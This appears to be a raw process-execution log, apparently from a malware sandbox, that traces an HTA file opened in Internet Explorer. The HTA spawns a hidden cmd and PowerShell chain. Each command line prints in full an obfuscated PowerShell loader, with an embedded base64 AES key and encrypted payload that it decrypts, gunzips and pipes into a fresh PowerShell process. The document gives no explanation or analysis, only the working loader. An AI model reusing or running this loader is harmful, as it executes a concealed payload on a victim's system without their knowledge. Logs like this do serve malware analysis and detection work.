iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\dma.hta.html
2612powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $PMYU = 'AAAAAAAAAAAAAAAAAAAAAO8FSCMAzk5US3uWBq0j3dt4XFMdIOSlZztWArLDsRkRGE54mvZqk8qfTMNEVZy15IDkKUr2ly7MXHOrJu8mDE9UPOhKvHz++F8tsOF9NaSsmMTp4F1Mv8efsi+QddKVSCSQmNl6j3ARsi1DHWyuyQwLy0rocy4IhGDyZkp8VAIMsfpVR3VhmDKfe49xViG41Wr8doPawSeV611s+MQEFFJPJPIjDGDFC05CXqhDtpnZWeecUV7S2iusXI4fAe6pAIqhPuOFqPLRzMqcJdu3T+/OmgV2hwB5+QKqgBEOBfE6hVpTVgGkPo60HRP6al2TTjsIH85Te/5QPhZoIA7lY7O3FNoDVZz/hdl4YJNOxHm2PhPYM6JdQwP/2VFmiTMQRNohRbA0b2JA6Jx2HJYCWoStXI3mRwCL5vCWbO429v3Tlfrjhe6AXHPObLAM5dox8xIhqxqdHpGXxpR1IRNym5bndzncJhldFqm5YlSTc4QB+/NDmnkhWuzPvTmihO1JuOKg76exHGlEffqO7wOfXXt1HWITZnEca5YvmaS+KIIlelTR/re5QfKEjIK9pWDC5Wuujli8SGtfMHORke0k93Y8fQoQ1T+qAihIe7KoKf4WeH4kl8sUxLzRjQjBB5SQn5FERGmQcWLiUtmrX/Ne3ESgLwhmJkiNMoFHIpH4nYB2H4jIOPTSv61PAmTluXJA+ng2w2se8fUVcTKBxbSTfy9vUuNWN/SGQupDUARdIrWOIAhfUxHriIFIGBo/6QU8I0h/J/I1BLZ9ayctoTYIb1i0vwpROjvnfbg+VmBwuZEyIHqrq0scMQyJ8JiPOcRpCyfwSyeO/be6WCsgLwJ2njrS5IeEJfZVueVOm8fvrxxviT8CwElGeONy6A9EFabtGg2HQEmAYujjQyw9ISdJZnKMA+Tmg7+26GWV4DprZXQA99IIbuWHHeYfeInbNFM4X9qWupj7SvX5CF2ykwg/+tswK/N60P0dq/cNXnEFVh3/';$iYJEvRn = 'UkpyVlpHb2ZJUWV0dlNLTkxKd0lGRWpkWWRxRWRCTmE=';$LfvAGfRR = New-Object 'System.Security.Cryptography.AesManaged';$LfvAGfRR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$LfvAGfRR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$LfvAGfRR.BlockSize = 128;$LfvAGfRR.KeySize = 256;$LfvAGfRR.Key = [System.Convert]::FromBase64String($iYJEvRn);$TQQdH = [System.Convert]::FromBase64String($PMYU);$QskgmnlX = $TQQdH[0..15];$LfvAGfRR.IV = $QskgmnlX;$SGtYchrPG = $LfvAGfRR.CreateDecryptor();$KyEgamOgH = $SGtYchrPG.TransformFinalBlock($TQQdH, 16, $TQQdH.Length - 16);$LfvAGfRR.Dispose();$PffmgxAq = New-Object System.IO.MemoryStream( , $KyEgamOgH );$yCtKdnfu = New-Object System.IO.MemoryStream;$xUGXInzyM = New-Object System.IO.Compression.GzipStream $PffmgxAq, ([IO.Compression.CompressionMode]::Decompress);$xUGXInzyM.CopyTo( $yCtKdnfu );$xUGXInzyM.Close();$PffmgxAq.Close();[byte[]] $vhNkq = $yCtKdnfu.ToArray();$GVAepQ = [System.Text.Encoding]::UTF8.GetString($vhNkq);$GVAepQ | powershell - }
2932cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $PMYU = 'AAAAAAAAAAAAAAAAAAAAAO8FSCMAzk5US3uWBq0j3dt4XFMdIOSlZztWArLDsRkRGE54mvZqk8qfTMNEVZy15IDkKUr2ly7MXHOrJu8mDE9UPOhKvHz++F8tsOF9NaSsmMTp4F1Mv8efsi+QddKVSCSQmNl6j3ARsi1DHWyuyQwLy0rocy4IhGDyZkp8VAIMsfpVR3VhmDKfe49xViG41Wr8doPawSeV611s+MQEFFJPJPIjDGDFC05CXqhDtpnZWeecUV7S2iusXI4fAe6pAIqhPuOFqPLRzMqcJdu3T+/OmgV2hwB5+QKqgBEOBfE6hVpTVgGkPo60HRP6al2TTjsIH85Te/5QPhZoIA7lY7O3FNoDVZz/hdl4YJNOxHm2PhPYM6JdQwP/2VFmiTMQRNohRbA0b2JA6Jx2HJYCWoStXI3mRwCL5vCWbO429v3Tlfrjhe6AXHPObLAM5dox8xIhqxqdHpGXxpR1IRNym5bndzncJhldFqm5YlSTc4QB+/NDmnkhWuzPvTmihO1JuOKg76exHGlEffqO7wOfXXt1HWITZnEca5YvmaS+KIIlelTR/re5QfKEjIK9pWDC5Wuujli8SGtfMHORke0k93Y8fQoQ1T+qAihIe7KoKf4WeH4kl8sUxLzRjQjBB5SQn5FERGmQcWLiUtmrX/Ne3ESgLwhmJkiNMoFHIpH4nYB2H4jIOPTSv61PAmTluXJA+ng2w2se8fUVcTKBxbSTfy9vUuNWN/SGQupDUARdIrWOIAhfUxHriIFIGBo/6QU8I0h/J/I1BLZ9ayctoTYIb1i0vwpROjvnfbg+VmBwuZEyIHqrq0scMQyJ8JiPOcRpCyfwSyeO/be6WCsgLwJ2njrS5IeEJfZVueVOm8fvrxxviT8CwElGeONy6A9EFabtGg2HQEmAYujjQyw9ISdJZnKMA+Tmg7+26GWV4DprZXQA99IIbuWHHeYfeInbNFM4X9qWupj7SvX5CF2ykwg/+tswK/N60P0dq/cNXnEFVh3/';$iYJEvRn = 'UkpyVlpHb2ZJUWV0dlNLTkxKd0lGRWpkWWRxRWRCTmE=';$LfvAGfRR = New-Object 'System.Security.Cryptography.AesManaged';$LfvAGfRR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$LfvAGfRR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$LfvAGfRR.BlockSize = 128;$LfvAGfRR.KeySize = 256;$LfvAGfRR.Key = [System.Convert]::FromBase64String($iYJEvRn);$TQQdH = [System.Convert]::FromBase64String($PMYU);$QskgmnlX = $TQQdH[0..15];$LfvAGfRR.IV = $QskgmnlX;$SGtYchrPG = $LfvAGfRR.CreateDecryptor();$KyEgamOgH = $SGtYchrPG.TransformFinalBlock($TQQdH, 16, $TQQdH.Length - 16);$LfvAGfRR.Dispose();$PffmgxAq = New-Object System.IO.MemoryStream( , $KyEgamOgH );$yCtKdnfu = New-Object System.IO.MemoryStream;$xUGXInzyM = New-Object System.IO.Compression.GzipStream $PffmgxAq, ([IO.Compression.CompressionMode]::Decompress);$xUGXInzyM.CopyTo( $yCtKdnfu );$xUGXInzyM.Close();$PffmgxAq.Close();[byte[]] $vhNkq = $yCtKdnfu.ToArray();$GVAepQ = [System.Text.Encoding]::UTF8.GetString($vhNkq);$GVAepQ | powershell -
2084powershell.exe powershell.exe $PMYU = 'AAAAAAAAAAAAAAAAAAAAAO8FSCMAzk5US3uWBq0j3dt4XFMdIOSlZztWArLDsRkRGE54mvZqk8qfTMNEVZy15IDkKUr2ly7MXHOrJu8mDE9UPOhKvHz++F8tsOF9NaSsmMTp4F1Mv8efsi+QddKVSCSQmNl6j3ARsi1DHWyuyQwLy0rocy4IhGDyZkp8VAIMsfpVR3VhmDKfe49xViG41Wr8doPawSeV611s+MQEFFJPJPIjDGDFC05CXqhDtpnZWeecUV7S2iusXI4fAe6pAIqhPuOFqPLRzMqcJdu3T+/OmgV2hwB5+QKqgBEOBfE6hVpTVgGkPo60HRP6al2TTjsIH85Te/5QPhZoIA7lY7O3FNoDVZz/hdl4YJNOxHm2PhPYM6JdQwP/2VFmiTMQRNohRbA0b2JA6Jx2HJYCWoStXI3mRwCL5vCWbO429v3Tlfrjhe6AXHPObLAM5dox8xIhqxqdHpGXxpR1IRNym5bndzncJhldFqm5YlSTc4QB+/NDmnkhWuzPvTmihO1JuOKg76exHGlEffqO7wOfXXt1HWITZnEca5YvmaS+KIIlelTR/re5QfKEjIK9pWDC5Wuujli8SGtfMHORke0k93Y8fQoQ1T+qAihIe7KoKf4WeH4kl8sUxLzRjQjBB5SQn5FERGmQcWLiUtmrX/Ne3ESgLwhmJkiNMoFHIpH4nYB2H4jIOPTSv61PAmTluXJA+ng2w2se8fUVcTKBxbSTfy9vUuNWN/SGQupDUARdIrWOIAhfUxHriIFIGBo/6QU8I0h/J/I1BLZ9ayctoTYIb1i0vwpROjvnfbg+VmBwuZEyIHqrq0scMQyJ8JiPOcRpCyfwSyeO/be6WCsgLwJ2njrS5IeEJfZVueVOm8fvrxxviT8CwElGeONy6A9EFabtGg2HQEmAYujjQyw9ISdJZnKMA+Tmg7+26GWV4DprZXQA99IIbuWHHeYfeInbNFM4X9qWupj7SvX5CF2ykwg/+tswK/N60P0dq/cNXnEFVh3/';$iYJEvRn = 'UkpyVlpHb2ZJUWV0dlNLTkxKd0lGRWpkWWRxRWRCTmE=';$LfvAGfRR = New-Object 'System.Security.Cryptography.AesManaged';$LfvAGfRR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$LfvAGfRR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$LfvAGfRR.BlockSize = 128;$LfvAGfRR.KeySize = 256;$LfvAGfRR.Key = [System.Convert]::FromBase64String($iYJEvRn);$TQQdH = [System.Convert]::FromBase64String($PMYU);$QskgmnlX = $TQQdH[0..15];$LfvAGfRR.IV = $QskgmnlX;$SGtYchrPG = $LfvAGfRR.CreateDecryptor();$KyEgamOgH = $SGtYchrPG.TransformFinalBlock($TQQdH, 16, $TQQdH.Length - 16);$LfvAGfRR.Dispose();$PffmgxAq = New-Object System.IO.MemoryStream( , $KyEgamOgH );$yCtKdnfu = New-Object System.IO.MemoryStream;$xUGXInzyM = New-Object System.IO.Compression.GzipStream $PffmgxAq, ([IO.Compression.CompressionMode]::Decompress);$xUGXInzyM.CopyTo( $yCtKdnfu );$xUGXInzyM.Close();$PffmgxAq.Close();[byte[]] $vhNkq = $yCtKdnfu.ToArray();$GVAepQ = [System.Text.Encoding]::UTF8.GetString($vhNkq);$GVAepQ
148powershell.exe powershell -
2220